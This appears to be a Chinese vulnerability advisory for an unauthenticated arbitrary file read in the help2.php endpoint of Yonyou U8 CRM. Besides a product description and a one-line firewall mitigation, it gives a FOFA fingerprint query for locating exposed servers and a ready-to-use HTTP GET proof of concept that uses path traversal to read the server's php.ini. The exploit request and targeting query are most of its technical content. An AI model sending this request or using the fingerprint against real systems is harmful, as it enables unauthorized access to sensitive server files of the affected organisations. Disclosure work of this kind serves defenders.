用友 CRM help2.php存在任意文件读取漏洞

产品简介

用友CRM（Customer Relationship Management，客户关系管理）是由用友公司开发的一款软件，专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系，提升客户满意度，优化销售和服务流程，从而提高企业的市场竞争力。它适用于各种规模的企业，可以根据不同企业的具体需求进行定制和扩展。

漏洞概述

用友CRM系统在help2.php接口处存在任意文件读取漏洞，未授权的攻击者可以通过此漏洞读取服务器上的敏感文件

指纹识别

fofa:

title=="用友U8CRM"

漏洞利用

poc：

GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

读取php配置文件

修复建议

临时缓解措施：在防火墙上设置访问策略，不允许任何人访问该路径

【天底下喜欢讲道理的人，大致可以分为两种，一种是为了让自己心里好受，一种是希望让世道好过。】